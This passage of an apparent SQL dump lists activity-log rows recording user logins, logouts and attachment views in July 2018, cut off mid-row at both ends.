09:50:30',NULL),(788,5,'Attachment',68,'2018-07-23 09:50:33','2018-07-23 09:50:33',NULL),(789,5,'Attachment',60,'2018-07-23 09:50:33','2018-07-23 09:50:33',NULL),(790,5,'Attachment',70,'2018-07-23 09:50:33','2018-07-23 09:50:33',NULL),(791,5,'Attachment',69,'2018-07-23 09:50:33','2018-07-23 09:50:33',NULL),(792,5,'Attachment',66,'2018-07-23 09:50:33','2018-07-23 09:50:33',NULL),(793,5,'Attachment',61,'2018-07-23 09:50:33','2018-07-23 09:50:33',NULL),(794,5,'Attachment',57,'2018-07-23 09:50:33','2018-07-23 09:50:33',NULL),(795,2,'Attachment',70,'2018-07-23 09:51:55','2018-07-23 09:51:55',NULL),(796,2,'Attachment',69,'2018-07-23 09:51:55','2018-07-23 09:51:55',NULL),(797,2,'Attachment',66,'2018-07-23 09:51:55','2018-07-23 09:51:55',NULL),(798,2,'Attachment',68,'2018-07-23 09:51:55','2018-07-23 09:51:55',NULL),(799,2,'Attachment',60,'2018-07-23 09:51:55','2018-07-23 09:51:55',NULL),(800,2,'Attachment',61,'2018-07-23 09:51:55','2018-07-23 09:51:55',NULL),(801,2,'Attachment',67,'2018-07-23 09:51:55','2018-07-23 09:51:55',NULL),(802,2,'Attachment',57,'2018-07-23 09:51:55','2018-07-23 09:51:55',NULL),(803,2,'Attachment',56,'2018-07-23 09:51:55','2018-07-23 09:51:55',NULL),(804,1,'Login',1,'2018-07-23 09:52:02','2018-07-23 09:52:02',NULL),(805,1,'Attachment',70,'2018-07-23 09:52:04','2018-07-23 09:52:04',NULL),(806,1,'Attachment',66,'2018-07-23 09:52:04','2018-07-23 09:52:04',NULL),(807,1,'Attachment',69,'2018-07-23 09:52:04','2018-07-23 09:52:04',NULL),(808,1,'Attachment',61,'2018-07-23 09:52:04','2018-07-23 09:52:04',NULL),(809,1,'Attachment',60,'2018-07-23 09:52:04','2018-07-23 09:52:04',NULL),(810,1,'Attachment',68,'2018-07-23 09:52:04','2018-07-23 09:52:04',NULL),(811,1,'Attachment',67,'2018-07-23 09:52:04','2018-07-23 09:52:04',NULL),(812,1,'Attachment',56,'2018-07-23 09:52:04','2018-07-23 09:52:04',NULL),(813,1,'Attachment',57,'2018-07-23 09:52:04','2018-07-23 09:52:04',NULL),(814,1,'Attachment',70,'2018-07-23 09:52:06','2018-07-23 09:52:06',NULL),(815,1,'Attachment',69,'2018-07-23 09:52:06','2018-07-23 09:52:06',NULL),(816,1,'Attachment',61,'2018-07-23 09:52:06','2018-07-23 09:52:06',NULL),(817,1,'Attachment',68,'2018-07-23 09:52:06','2018-07-23 09:52:06',NULL),(818,1,'Attachment',66,'2018-07-23 09:52:06','2018-07-23 09:52:06',NULL),(819,1,'Attachment',67,'2018-07-23 09:52:06','2018-07-23 09:52:06',NULL),(820,1,'Attachment',60,'2018-07-23 09:52:06','2018-07-23 09:52:06',NULL),(821,1,'Attachment',57,'2018-07-23 09:52:06','2018-07-23 09:52:06',NULL),(822,1,'Attachment',56,'2018-07-23 09:52:06','2018-07-23 09:52:06',NULL),(823,1,'Attachment',20,'2018-07-23 09:52:08','2018-07-23 09:52:08',NULL),(824,1,'Attachment',25,'2018-07-23 09:52:08','2018-07-23 09:52:08',NULL),(825,1,'Attachment',14,'2018-07-23 09:52:08','2018-07-23 09:52:08',NULL),(826,1,'Attachment',54,'2018-07-23 09:52:08','2018-07-23 09:52:08',NULL),(827,1,'Attachment',38,'2018-07-23 09:52:08','2018-07-23 09:52:08',NULL),(828,1,'Attachment',55,'2018-07-23 09:52:08','2018-07-23 09:52:08',NULL),(829,1,'Attachment',21,'2018-07-23 09:52:08','2018-07-23 09:52:08',NULL),(830,1,'Attachment',19,'2018-07-23 09:52:08','2018-07-23 09:52:08',NULL),(831,1,'Attachment',26,'2018-07-23 09:52:08','2018-07-23 09:52:08',NULL),(832,1,'Attachment',42,'2018-07-23 09:52:08','2018-07-23 09:52:08',NULL),(833,1,'Attachment',41,'2018-07-23 09:52:08','2018-07-23 09:52:08',NULL),(834,1,'Attachment',27,'2018-07-23 09:52:08','2018-07-23 09:52:08',NULL),(835,1,'Attachment',15,'2018-07-23 09:52:08','2018-07-23 09:52:08',NULL),(836,1,'Attachment',22,'2018-07-23 09:52:08','2018-07-23 09:52:08',NULL),(837,1,'Attachment',43,'2018-07-23 09:52:08','2018-07-23 09:52:08',NULL),(838,1,'Attachment',44,'2018-07-23 09:52:08','2018-07-23 09:52:08',NULL),(839,2,'Attachment',28,'2018-07-23 10:04:40','2018-07-23 10:04:40',NULL),(840,2,'Attachment',37,'2018-07-23 10:04:40','2018-07-23 10:04:40',NULL),(841,2,'Attachment',34,'2018-07-23 10:04:40','2018-07-23 10:04:40',NULL),(842,2,'Attachment',35,'2018-07-23 10:04:40','2018-07-23 10:04:40',NULL),(843,2,'Attachment',30,'2018-07-23 10:07:50','2018-07-23 10:07:50',NULL),(844,2,'Attachment',33,'2018-07-23 10:07:50','2018-07-23 10:07:50',NULL),(845,2,'Attachment',32,'2018-07-23 10:07:50','2018-07-23 10:07:50',NULL),(846,2,'Attachment',31,'2018-07-23 10:07:50','2018-07-23 10:07:50',NULL),(847,2,'Attachment',23,'2018-07-23 10:07:50','2018-07-23 10:07:50',NULL),(848,2,'Attachment',24,'2018-07-23 10:08:34','2018-07-23 10:08:34',NULL),(849,1,'Attachment',70,'2018-07-23 11:06:21','2018-07-23 11:06:21',NULL),(850,1,'Attachment',69,'2018-07-23 11:06:22','2018-07-23 11:06:22',NULL),(851,1,'Attachment',68,'2018-07-23 11:06:22','2018-07-23 11:06:22',NULL),(852,1,'Attachment',66,'2018-07-23 11:06:22','2018-07-23 11:06:22',NULL),(853,1,'Attachment',60,'2018-07-23 11:06:22','2018-07-23 11:06:22',NULL),(854,1,'Attachment',57,'2018-07-23 11:06:22','2018-07-23 11:06:22',NULL),(855,1,'Attachment',61,'2018-07-23 11:06:22','2018-07-23 11:06:22',NULL),(856,1,'Attachment',67,'2018-07-23 11:06:22','2018-07-23 11:06:22',NULL),(857,1,'Attachment',56,'2018-07-23 11:06:22','2018-07-23 11:06:22',NULL),(858,1,'Attachment',55,'2018-07-23 11:22:07','2018-07-23 11:22:07',NULL),(859,1,'Attachment',20,'2018-07-23 11:22:08','2018-07-23 11:22:08',NULL),(860,1,'Attachment',70,'2018-07-23 11:22:08','2018-07-23 11:22:08',NULL),(861,1,'Attachment',60,'2018-07-23 11:22:08','2018-07-23 11:22:08',NULL),(862,1,'Attachment',57,'2018-07-23 11:22:09','2018-07-23 11:22:09',NULL),(863,1,'Attachment',56,'2018-07-23 11:22:09','2018-07-23 11:22:09',NULL),(864,1,'Attachment',14,'2018-07-23 11:22:10','2018-07-23 11:22:10',NULL),(865,1,'Attachment',25,'2018-07-23 11:22:10','2018-07-23 11:22:10',NULL),(866,1,'Attachment',54,'2018-07-23 11:22:10','2018-07-23 11:22:10',NULL),(867,1,'Attachment',38,'2018-07-23 11:22:10','2018-07-23 11:22:10',NULL),(868,1,'Attachment',66,'2018-07-23 11:22:11','2018-07-23 11:22:11',NULL),(869,1,'Attachment',68,'2018-07-23 11:22:11','2018-07-23 11:22:11',NULL),(870,1,'Attachment',69,'2018-07-23 11:22:11','2018-07-23 11:22:11',NULL),(871,1,'Attachment',67,'2018-07-23 11:22:11','2018-07-23 11:22:11',NULL),(872,1,'Attachment',61,'2018-07-23 11:22:11','2018-07-23 11:22:11',NULL),(873,2,'Attachment',66,'2018-07-23 11:22:11','2018-07-23 11:22:11',NULL),(874,2,'Attachment',69,'2018-07-23 11:22:11','2018-07-23 11:22:11',NULL),(875,2,'Attachment',68,'2018-07-23 11:22:11','2018-07-23 11:22:11',NULL),(876,2,'Attachment',61,'2018-07-23 11:22:11','2018-07-23 11:22:11',NULL),(877,2,'Attachment',70,'2018-07-23 11:22:11','2018-07-23 11:22:11',NULL),(878,2,'Attachment',67,'2018-07-23 11:22:11','2018-07-23 11:22:11',NULL),(879,2,'Attachment',57,'2018-07-23 11:22:11','2018-07-23 11:22:11',NULL),(880,2,'Attachment',60,'2018-07-23 11:22:11','2018-07-23 11:22:11',NULL),(881,2,'Attachment',56,'2018-07-23 11:22:11','2018-07-23 11:22:11',NULL),(882,2,'Attachment',55,'2018-07-23 11:22:16','2018-07-23 11:22:16',NULL),(883,2,'Attachment',54,'2018-07-23 11:22:17','2018-07-23 11:22:17',NULL),(884,2,'Attachment',25,'2018-07-23 11:22:17','2018-07-23 11:22:17',NULL),(885,2,'Attachment',38,'2018-07-23 11:22:17','2018-07-23 11:22:17',NULL),(886,2,'Attachment',27,'2018-07-23 11:22:17','2018-07-23 11:22:17',NULL),(887,2,'Attachment',26,'2018-07-23 11:22:17','2018-07-23 11:22:17',NULL),(888,2,'Attachment',15,'2018-07-23 11:22:17','2018-07-23 11:22:17',NULL),(889,2,'Attachment',36,'2018-07-23 11:22:17','2018-07-23 11:22:17',NULL),(890,2,'Attachment',39,'2018-07-23 11:22:18','2018-07-23 11:22:18',NULL),(891,2,'Attachment',49,'2018-07-23 11:22:19','2018-07-23 11:22:19',NULL),(892,2,'Attachment',50,'2018-07-23 11:22:19','2018-07-23 11:22:19',NULL),(893,2,'Attachment',51,'2018-07-23 11:22:19','2018-07-23 11:22:19',NULL),(894,2,'Attachment',46,'2018-07-23 11:22:20','2018-07-23 11:22:20',NULL),(895,2,'Attachment',45,'2018-07-23 11:22:20','2018-07-23 11:22:20',NULL),(896,2,'Attachment',41,'2018-07-23 11:22:20','2018-07-23 11:22:20',NULL),(897,2,'Attachment',44,'2018-07-23 11:22:20','2018-07-23 11:22:20',NULL),(898,2,'Attachment',42,'2018-07-23 11:22:20','2018-07-23 11:22:20',NULL),(899,2,'Attachment',43,'2018-07-23 11:22:20','2018-07-23 11:22:20',NULL),(900,2,'Attachment',47,'2018-07-23 11:22:20','2018-07-23 11:22:20',NULL),(901,5,'Login',5,'2018-07-23 11:22:47','2018-07-23 11:22:47',NULL),(902,1,'Attachment',25,'2018-07-23 11:23:28','2018-07-23 11:23:28',NULL),(903,1,'Attachment',20,'2018-07-23 11:23:28','2018-07-23 11:23:28',NULL),(904,1,'Attachment',38,'2018-07-23 11:23:28','2018-07-23 11:23:28',NULL),(905,1,'Attachment',55,'2018-07-23 11:23:28','2018-07-23 11:23:28',NULL),(906,1,'Attachment',14,'2018-07-23 11:23:28','2018-07-23 11:23:28',NULL),(907,1,'Attachment',54,'2018-07-23 11:23:28','2018-07-23 11:23:28',NULL),(908,1,'Attachment',21,'2018-07-23 11:23:28','2018-07-23 11:23:28',NULL),(909,1,'Attachment',19,'2018-07-23 11:23:28','2018-07-23 11:23:28',NULL),(910,5,'Attachment',69,'2018-07-23 11:23:36','2018-07-23 11:23:36',NULL),(911,5,'Attachment',70,'2018-07-23 11:23:36','2018-07-23 11:23:36',NULL),(912,5,'Attachment',61,'2018-07-23 11:23:36','2018-07-23 11:23:36',NULL),(913,5,'Attachment',66,'2018-07-23 11:23:36','2018-07-23 11:23:36',NULL),(914,5,'Attachment',68,'2018-07-23 11:23:36','2018-07-23 11:23:36',NULL),(915,5,'Attachment',56,'2018-07-23 11:23:36','2018-07-23 11:23:36',NULL),(916,5,'Attachment',57,'2018-07-23 11:23:36','2018-07-23 11:23:36',NULL),(917,5,'Attachment',67,'2018-07-23 11:23:36','2018-07-23 11:23:36',NULL),(918,5,'Attachment',60,'2018-07-23 11:23:36','2018-07-23 11:23:36',NULL),(919,5,'Attachment',41,'2018-07-23 11:23:47','2018-07-23 11:23:47',NULL),(920,5,'Attachment',43,'2018-07-23 11:23:47','2018-07-23 11:23:47',NULL),(921,5,'Attachment',42,'2018-07-23 11:23:47','2018-07-23 11:23:47',NULL),(922,1,'Logout',1,'2018-07-23 11:23:49','2018-07-23 11:23:49',NULL),(923,5,'Attachment',49,'2018-07-23 11:24:15','2018-07-23 11:24:15',NULL),(924,5,'Attachment',51,'2018-07-23 11:24:15','2018-07-23 11:24:15',NULL),(925,5,'Attachment',50,'2018-07-23 11:24:15','2018-07-23 11:24:15',NULL),(926,5,'Attachment',39,'2018-07-23 11:24:16','2018-07-23 11:24:16',NULL),(927,5,'Attachment',25,'2018-07-23 11:24:18','2018-07-23 11:24:18',NULL),(928,5,'Attachment',26,'2018-07-23 11:24:18','2018-07-23 11:24:18',NULL),(929,5,'Attachment',38,'2018-07-23 11:24:18','2018-07-23 11:24:18',NULL),(930,5,'Attachment',54,'2018-07-23 11:24:18','2018-07-23 11:24:18',NULL),(931,5,'Attachment',55,'2018-07-23 11:24:19','2018-07-23 11:24:19',NULL),(932,2,'Attachment',42,'2018-07-23 11:24:21','2018-07-23 11:24:21',NULL),(933,2,'Attachment',45,'2018-07-23 11:24:21','2018-07-23 11:24:21',NULL),(934,2,'Attachment',46,'2018-07-23 11:24:21','2018-07-23 11:24:21',NULL),(935,2,'Attachment',43,'2018-07-23 11:24:21','2018-07-23 11:24:21',NULL),(936,2,'Attachment',44,'2018-07-23 11:24:21','2018-07-23 11:24:21',NULL),(937,2,'Attachment',41,'2018-07-23 11:24:21','2018-07-23 11:24:21',NULL),(938,2,'Attachment',47,'2018-07-23 11:24:22','2018-07-23 11:24:22',NULL),(939,5,'Attachment',14,'2018-07-23 11:24:23','2018-07-23 11:24:23',NULL),(940,5,'Attachment',21,'2018-07-23 11:24:23','2018-07-23 11:24:23',NULL),(941,5,'Attachment',20,'2018-07-23 11:24:23','2018-07-23 11:24:23',NULL),(942,5,'Attachment',19,'2018-07-23 11:24:23','2018-07-23 11:24:23',NULL),(943,5,'Attachment',22,'2018-07-23 11:24:25','2018-07-23 11:24:25',NULL),(944,5,'Attachment',29,'2018-07-23 11:24:27','2018-07-23 11:24:27',NULL),(945,5,'Attachment',40,'2018-07-23 11:24:27','2018-07-23 11:24:27',NULL),(946,5,'Attachment',9,'2018-07-23 11:24:27','2018-07-23 11:24:27',NULL),(947,5,'Attachment',48,'2018-07-23 11:24:27','2018-07-23 11:24:27',NULL),(948,5,'Attachment',28,'2018-07-23 11:24:31','2018-07-23 11:24:31',NULL),(949,5,'Attachment',37,'2018-07-23 11:24:31','2018-07-23 11:24:31',NULL),(950,5,'Attachment',35,'2018-07-23 11:24:31','2018-07-23 11:24:31',NULL),(951,5,'Attachment',34,'2018-07-23 11:24:31','2018-07-23 11:24:31',NULL),(952,5,'Attachment',31,'2018-07-23 11:24:32','2018-07-23 11:24:32',NULL),(953,5,'Attachment',30,'2018-07-23 11:24:32','2018-07-23 11:24:32',NULL),(954,5,'Attachment',33,'2018-07-23 11:24:32','2018-07-23 11:24:32',NULL),(955,5,'Attachment',32,'2018-07-23 11:24:32','2018-07-23 11:24:32',NULL),(956,5,'Attachment',23,'2018-07-23 11:24:33','2018-07-23 11:24:33',NULL),(957,5,'Attachment',24,'2018-07-23 11:24:34','2018-07-23 11:24:34',NULL),(958,1,'Login',1,'2018-07-23 11:24:35','2018-07-23 11:24:35',NULL),(959,1,'Logout',1,'2018-07-23 11:24:45','2018-07-23 11:24:45',NULL),(960,5,'Login',5,'2018-07-23 11:25:22','2018-07-23 11:25:22',NULL),(961,5,'Attachment',49,'2018-07-23 11:25:52','2018-07-23 11:25:52',NULL),(962,5,'Attachment',51,'2018-07-23 11:25:52','2018-07-23 11:25:52',NULL),(963,5,'Attachment',50,'2018-07-23 11:25:52','2018-07-23 11:25:52',NULL),(964,5,'Attachment',69,'2018-07-23 11:26:36','2018-07-23 11:26:36',NULL),(965,5,'Attachment',68,'2018-07-23 11:26:36','2018-07-23 11:26:36',NULL),(966,5,'Attachment',70,'2018-07-23 11:26:36','2018-07-23 11:26:36',NULL),(967,5,'Attachment',66,'2018-07-23 11:26:36','2018-07-23 11:26:36',NULL),(968,5,'Attachment',61,'2018-07-23 11:26:36','2018-07-23 11:26:36',NULL),(969,5,'Attachment',60,'2018-07-23 11:26:37','2018-07-23 11:26:37',NULL),(970,5,'Attachment',57,'2018-07-23 11:26:37','2018-07-23 11:26:37',NULL),(971,5,'Attachment',67,'2018-07-23 11:26:37','2018-07-23 11:26:37',NULL),(972,5,'Attachment',56,'2018-07-23 11:26:37','2018-07-23 11:26:37',NULL),(973,5,'Attachment',42,'2018-07-23 11:26:44','2018-07-23 11:26:44',NULL),(974,5,'Attachment',41,'2018-07-23 11:26:44','2018-07-23 11:26:44',NULL),(975,5,'Attachment',46,'2018-07-23 11:26:44','2018-07-23 11:26:44',NULL),(976,5,'Attachment',45,'2018-07-23 11:26:44','2018-07-23 11:26:44',NULL),(977,5,'Attachment',44,'2018-07-23 11:26:44','2018-07-23 11:26:44',NULL),(978,5,'Attachment',43,'2018-07-23 11:26:44','2018-07-23 11:26:44',NULL),(979,5,'Attachment',47,'2018-07-23 11:26:44','2018-07-23 11:26:44',NULL),(980,5,'Attachment',56,'2018-07-23 11:28:31','2018-07-23 11:28:31',NULL),(981,5,'Attachment',68,'2018-07-23 11:28:31','2018-07-23 11:28:31',NULL),(982,5,'Attachment',70,'2018-07-23 11:28:31','2018-07-23 11:28:31',NULL),(983,5,'Attachment',61,'2018-07-23 11:28:31','2018-07-23 11:28:31',NULL),(984,5,'Attachment',69,'2018-07-23 11:28:31','2018-07-23 11:28:31',NULL),(985,5,'Attachment',66,'2018-07-23 11:28:31','2018-07-23 11:28:31',NULL),(986,5,'Attachment',60,'2018-07-23 11:28:31','2018-07-23 11:28:31',NULL),(987,5,'Attachment',57,'2018-07-23 11:28:32','2018-07-23 11:28:32',NULL),(988,5,'Attachment',67,'2018-07-23 11:28:32','2018-07-23 11:28:32',NULL),(989,5,'Attachment',44,'2018-07-23 11:28:33','2018-07-23 11:28:33',NULL),(990,5,'Attachment',42,'2018-07-23 11:28:33','2018-07-23 11:28:33',NULL),(991,5,'Attachment',43,'2018-07-23 11:28:33','2018-07-23 11:28:33',NULL),(992,5,'Attachment',41,'2018-07-23 11:28:33','2018-07-23 11:28:33',NULL),(993,2,'Attachment',70,'2018-07-23 11:30:19','2018-07-23 11:30:19',NULL),(994,2,'Attachment',69,'2018-07-23 11:30:20','2018-07-23 11:30:20',NULL),(995,2,'Attachment',68,'2018-07-23 11:30:20','2018-07-23 11:30:20',NULL),(996,2,'Attachment',66,'2018-07-23 11:30:20','2018-07-23 11:30:20',NULL),(997,2,'Attachment',61,'2018-07-23 11:30:20','2018-07-23 11:30:20',NULL),(998,2,'Attachment',60,'2018-07-23 11:30:20','2018-07-23 11:30:20',NULL),(999,2,'Attachment',56,'2018-07-23 11:30:20','2018-07-23 11:30:20',NULL),(1000,2,'Attachment',57,'2018-07-23 11:30:20','2018-07-23 11:30:20',NULL),(1001,2,'Attachment',67,'2018-07-23 11:30:20','2018-07-23 11:30:20',NULL),(1002,2,'Attachment',44,'2018-07-23 11:30:22','2018-07-23 11:30:22',NULL),(1003,2,'Attachment',41,'2018-07-23 11:30:22','2018-07-23 11:30:22',NULL),(1004,2,'Attachment',46,'2018-07-23 11:30:22','2018-07-23 11:30:22',NULL),(1005,2,'Attachment',42,'2018-07-23 11:30:22','2018-07-23 11:30:22',NULL),(1006,2,'Attachment',45,'2018-07-23 11:30:22','2018-07-23 11:30:22',NULL),(1007,2,'Attachment',43,'2018-07-23 11:30:22','2018-07-23 11:30:22',NULL),(1008,2,'Attachment',47,'2018-07-23 11:30:23','2018-07-23 11:30:23',NULL),(1009,5,'Attachment',61,'2018-07-23 11:34:19','2018-07-23 11:34:19',NULL),(1010,5,'Attachment',66,'2018-07-23 11:34:19','2018-07-23 11:34:19',NULL),(1011,5,'Attachment',69,'2018-07-23 11:34:19','2018-07-23 11:34:19',NULL),(1012,5,'Attachment',68,'2018-07-23 11:34:19','2018-07-23 11:34:19',NULL),(1013,5,'Attachment',60,'2018-07-23 11:34:19','2018-07-23 11:34:19',NULL),(1014,5,'Attachment',57,'2018-07-23 11:34:19','2018-07-23 11:34:19',NULL),(1015,5,'Attachment',67,'2018-07-23 11:34:19','2018-07-23 11:34:19',NULL),(1016,5,'Attachment',41,'2018-07-23 11:34:22','2018-07-23 11:34:22',NULL),(1017,5,'Attachment',42,'2018-07-23 11:34:22','2018-07-23 11:34:22',NULL),(1018,5,'Attachment',43,'2018-07-23 11:34:22','2018-07-23 11:34:22',NULL),(1019,5,'Attachment',70,'2018-07-23 11:34:39','2018-07-23 11:34:39',NULL),(1020,5,'Attachment',41,'2018-07-23 11:34:59','2018-07-23 11:34:59',NULL),(1021,5,'Attachment',46,'2018-07-23 11:34:59','2018-07-23 11:34:59',NULL),(1022,5,'Attachment',42,'2018-07-23 11:34:59','2018-07-23 11:34:59',NULL),(1023,5,'Attachment',45,'2018-07-23 11:34:59','2018-07-23 11:34:59',NULL),(1024,5,'Attachment',43,'2018-07-23 11:34:59','2018-07-23 11:34:59',NULL),(1025,5,'Attachment',44,'2018-07-23 11:34:59','2018-07-23 11:34:59',NULL),(1026,5,'Attachment',47,'2018-07-23 11:34:59','2018-07-23 11:34:59',NULL),(1027,5,'Attachment',49,'2018-07-23 11:35:07','2018-07-23 11:35:07',NULL),(1028,5,'Attachment',51,'2018-07-23 11:35:07','2018-07-23 11:35:07',NULL),(1029,5,'Attachment',50,'2018-07-23 11:35:07','2018-07-23 11:35:07',NULL),(1030,2,'Attachment',40,'2018-07-23 16:23:09','2018-07-23 16:23:09',NULL),(1031,2,'Attachment',9,'2018-07-23 16:23:09','2018-07-23 16:23:09',NULL),(1032,2,'Attachment',49,'2018-07-23 16:24:44','2018-07-23 16:24:44',NULL),(1033,2,'Attachment',50,'2018-07-23 16:24:44','2018-07-23 16:24:44',NULL),(1034,2,'Attachment',51,'2018-07-23 16:24:44','2018-07-23 16:24:44',NULL),(1035,2,'Attachment',39,'2018-07-23 16:24:46','2018-07-23 16:24:46',NULL),(1036,2,'Attachment',26,'2018-07-23 16:24:48','2018-07-23 16:24:48',NULL),(1037,2,'Attachment',54,'2018-07-23 16:24:48','2018-07-23 16:24:48',NULL),(1038,2,'Attachment',25,'2018-07-23 16:24:48','2018-07-23 16:24:48',NULL),(1039,2,'Attachment',38,'2018-07-23 16:24:48','2018-07-23 16:24:48',NULL),(1040,2,'Attachment',15,'2018-07-23 16:24:48','2018-07-23 16:24:48',NULL),(1041,2,'Attachment',27,'2018-07-23 16:24:48','2018-07-23 16:24:48',NULL),(1042,2,'Attachment',36,'2018-07-23 16:24:48','2018-07-23 16:24:48',NULL),(1043,2,'Attachment',55,'2018-07-23 16:24:50','2018-07-23 16:24:50',NULL),(1044,5,'Login',5,'2018-07-23 16:26:26','2018-07-23 16:26:26',NULL),(1045,2,'Attachment',70,'2018-07-24 15:53:39','2018-07-24 15:53:39',NULL),(1046,2,'Attachment',69,'2018-07-24 15:53:40','2018-07-24 15:53:40',NULL),(1047,2,'Attachment',68,'2018-07-24 15:53:40','2018-07-24 15:53:40',NULL),(1048,2,'Attachment',66,'2018-07-24 15:53:40','2018-07-24 15:53:40',NULL),(1049,2,'Attachment',60,'2018-07-24 15:53:40','2018-07-24 15:53:40',NULL),(1050,2,'Attachment',57,'2018-07-24 15:53:40','2018-07-24 15:53:40',NULL),(1051,2,'Attachment',56,'2018-07-24 15:53:40','2018-07-24 15:53:40',NULL),(1052,2,'Attachment',61,'2018-07-24 15:53:40','2018-07-24 15:53:40',NULL),(1053,2,'Attachment',67,'2018-07-24 15:53:40','2018-07-24 15:53:40',NULL),(1054,1,'Login',1,'2018-07-24 15:53:49','2018-07-24 15:53:49',NULL),(1055,1,'Login',1,'2018-07-25 14:24:48','2018-07-25 14:24:48',NULL),(1056,2,'Attachment',66,'2018-07-25 14:25:17','2018-07-25 14:25:17',NULL),(1057,2,'Attachment',70,'2018-07-25 14:25:17','2018-07-25 14:25:17',NULL),(1058,2,'Attachment',68,'2018-07-25 14:25:17','2018-07-25 14:25:17',NULL),(1059,2,'Attachment',61,'2018-07-25 14:25:17','2018-07-25 14:25:17',NULL),(1060,2,'Attachment',69,'2018-07-25 14:25:17','2018-07-25 14:25:17',NULL),(1061,2,'Attachment',60,'2018-07-25 14:25:17','2018-07-25 14:25:17',NULL),(1062,2,'Attachment',57,'2018-07-25 14:25:17','2018-07-25 14:25:17',NULL),(1063,2,'Attachment',67,'2018-07-25 14:25:17','2018-07-25 14:25:17',NULL),(1064,2,'Attachment',56,'2018-07-25 14:25:17','2018-07-25 14:25:17',NULL),(1065,2,'Attachment',46,'2018-07-25 14:25:20','2018-07-25 14:25:20',NULL),(1066,2,'Attachment',45,'2018-07-25 14:25:20','2018-07-25 14:25:20',NULL),(1067,2,'Attachment',44,'2018-07-25 14:25:20','2018-07-25 14:25:20',NULL),(1068,2,'Attachment',41,'2018-07-25 14:25:20','2018-07-25 14:25:20',NULL),(1069,2,'Attachment',42,'2018-07-25 14:25:20','2018-07-25 14:25:20',NULL),(1070,2,'Attachment',43,'2018-07-25 14:25:20','2018-07-25 14:25:20',NULL),(1071,2,'Attachment',47,'2018-07-25 14:25:20','2018-07-25 14:25:20',NULL),(1072,1,'Attachment',28,'2018-07-25 14:25:42','2018-07-25 14:25:42',NULL),(1073,1,'Attachment',37,'2018-07-25 14:25:42','2018-07-25 14:25:42',NULL),(1074,1,'Attachment',35,'2018-07-25 14:25:42','2018-07-25 14:25:42',NULL),(1075,1,'Attachment',34,'2018-07-25 14:25:42','2018-07-25 14:25:42',NULL),(1076,5,'Login',5,'2018-07-25 14:27:20','2018-07-25 14:27:20',NULL),(1077,5,'Attachment',69,'2018-07-25 14:27:29','2018-07-25 14:27:29',NULL),(1078,5,'Attachment',70,'2018-07-25 14:27:29','2018-07-25 14:27:29',NULL),(1079,5,'Attachment',68,'2018-07-25 14:27:29','2018-07-25 14:27:29',NULL),(1080,5,'Attachment',66,'2018-07-25 14:27:29','2018-07-25 14:27:29',NULL),(1081,5,'Attachment',61,'2018-07-25 14:27:29','2018-07-25 14:27:29',NULL),(1082,5,'Attachment',57,'2018-07-25 14:27:29','2018-07-25 14:27:29',NULL),(1083,5,'Attachment',60,'2018-07-25 14:27:29','2018-07-25 14:27:29',NULL),(1084,5,'Attachment',56,'2018-07-25 14:27:29','2018-07-25 14:27:29',NULL),(1085,5,'Attachment',67,'2018-07-25 14:27:29','2018-07-25 14:27:29',NULL),(1086,5,'Attachment',56,'2018-07-25 14:28:01','2018-07-25 14:28:01',NULL),(1087,5,'Attachment',66,'2018-07-25 14:28:01','2018-07-25 14:28:01',NULL),(1088,5,'Attachment',61,'2018-07-25 14:28:01','2018-07-25 14:28:01',NULL),(1089,2,'Attachment',70,'2018-07-25 15:59:20','2018-07-25 15:59:20',NULL),(1090,2,'Attachment',66,'2018-07-25 15:59:20','2018-07-25 15:59:20',NULL),(1091,2,'Attachment',68,'2018-07-25 15:59:20','2018-07-25 15:59:20',NULL),(1092,2,'Attachment',60,'2018-07-25 15:59:20','2018-07-25 15:59:20',NULL),(1093,2,'Attachment',61,'2018-07-25 15:59:20','2018-07-25 15:59:20',NULL),(1094,2,'Attachment',69,'2018-07-25 15:59:20','2018-07-25 15:59:20',NULL),(1095,2,'Attachment',67,'2018-07-25 15:59:20','2018-07-25 15:59:20',NULL),(1096,2,'Attachment',57,'2018-07-25 15:59:20','2018-07-25 15:59:20',NULL),(1097,2,'Attachment',56,'2018-07-25 15:59:20','2018-07-25 15:59:20',NULL),(1098,1,'Attachment',70,'2018-07-25 16:08:45','2018-07-25 16:08:45',NULL),(1099,1,'Attachment',69,'2018-07-25 16:08:45','2018-07-25 16:08:45',NULL),(1100,1,'Attachment',70,'2018-07-25 16:08:45','2018-07-25 16:08:45',NULL),(1101,1,'Attachment',68,'2018-07-25 16:08:45','2018-07-25 16:08:45',NULL),(1102,1,'Attachment',66,'2018-07-25 16:08:45','2018-07-25 16:08:45',NULL),(1103,1,'Attachment',61,'2018-07-25 16:08:45','2018-07-25 16:08:45',NULL),(1104,1,'Attachment',60,'2018-07-25 16:08:45','2018-07-25 16:08:45',NULL),(1105,1,'Attachment',57,'2018-07-25 16:08:45','2018-07-25 16:08:45',NULL),(1106,1,'Attachment',56,'2018-07-25 16:08:45','2018-07-25 16:08:45',NULL),(1107,1,'Attachment',67,'2018-07-25 16:08:45','2018-07-25 16:08:45',NULL),(1108,1,'Logout',1,'2018-07-27 10:01:07','2018-07-27 10:01:07',NULL),(1109,1,'Login',1,'2018-07-27 10:02:00','2018-07-27 10:02:00',NULL),(1110,2,'Attachment',69,'2018-07-27 10:27:35','2018-07-27 10:27:35',NULL),(1111,2,'Attachment',70,'2018-07-27 10:27:35','2018-07-27 10:27:35',NULL),(1112,2,'Attachment',66,'2018-07-27 10:27:35','2018-07-27 10:27:35',NULL),(1113,2,'Attachment',60,'2018-07-27 10:27:35','2018-07-27 10:27:35',NULL),(1114,2,'Attachment',68,'2018-07-27 10:27:35','2018-07-27 10:27:35',NULL),(1115,2,'Attachment',61,'2018-07-27 10:27:35','2018-07-27 10:27:35',NULL),(1116,2,'Attachment',57,'2018-07-27 10:27:36','2018-07-27 10:27:36',NULL),(1117,2,'Attachment',67,'2018-07-27 10:27:36','2018-07-27 10:27:36',NULL),(1118,2,'Attachment',56,'2018-07-27 10:27:36','2018-07-27 10:27:36',NULL),(1119,2,'Attachment',70,'2018-07-27 10:58:05','2018-07-27 10:58:05',NULL),(1120,2,'Attachment',69,'2018-07-27 10:58:05','2018-07-27 10:58:05',NULL),(1121,2,'Attachment',68,'2018-07-27 10:58:05','2018-07-27 10:58:05',NULL),(1122,2,'Attachment',66,'2018-07-27 10:58:05','2018-07-27 10:58:05',NULL),(1123,2,'Attachment',61,'2018-07-27 10:58:06','2018-07-27 10:58:06',NULL),(1124,2,'Attachment',60,'2018-07-27 10:58:06','2018-07-27 10:58:06',NULL),(1125,2,'Attachment',57,'2018-07-27 10:58:06','2018-07-27 